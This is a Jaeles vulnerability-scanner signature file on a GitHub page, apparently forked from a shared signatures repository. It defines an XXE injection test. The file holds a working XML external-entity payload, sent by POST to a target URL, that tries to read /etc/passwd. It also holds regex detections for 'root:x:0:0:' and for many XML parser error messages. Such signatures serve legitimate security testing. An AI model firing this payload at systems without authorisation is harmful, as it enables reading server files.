forked from ghsec/ghsec-jaeles-signatures
-
Notifications
You must be signed in to change notification settings - Fork 0
/
xxe-injection.yaml
22 lines (19 loc) · 1.12 KB
/
xxe-injection.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Signature catchs XXE errors and "root:x"
id: XXE-Injection
info:
name: XXE Injection
risk: Critical
params:
- root: '{{.URL}}'
requests:
- method: POST
redirect: false
url: >-
{{.root}}
body: >-
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>&test;</root>
detections:
- >-
RegexSearch("resBody", "root:[x*]:0:0:") || RegexSearch("resBody", "simplexml_load_string|parser error :|An error occured!|xmlParseEntityDecl|simplexml_load_string|xmlParseInternalSubset|DOCTYPE improperly terminated|Start tag expected|No declaration for attribute|No declaration for element|failed to load external entity|Start tag expected|Invalid URI: file:|Malformed declaration expecting version|Unicode strings with encoding|must be well-formed|Content is not allowed in prolog|org.xml.sax|SAXParseException|com.sun.org.apache.xerces|ParseError|nokogiri|REXML|XML syntax error on line|Error unmarshaling XML|conflicts with field|illegal character code|XML Parsing Error|SyntaxError|no root element|not well-formed|could not be parsed from XML")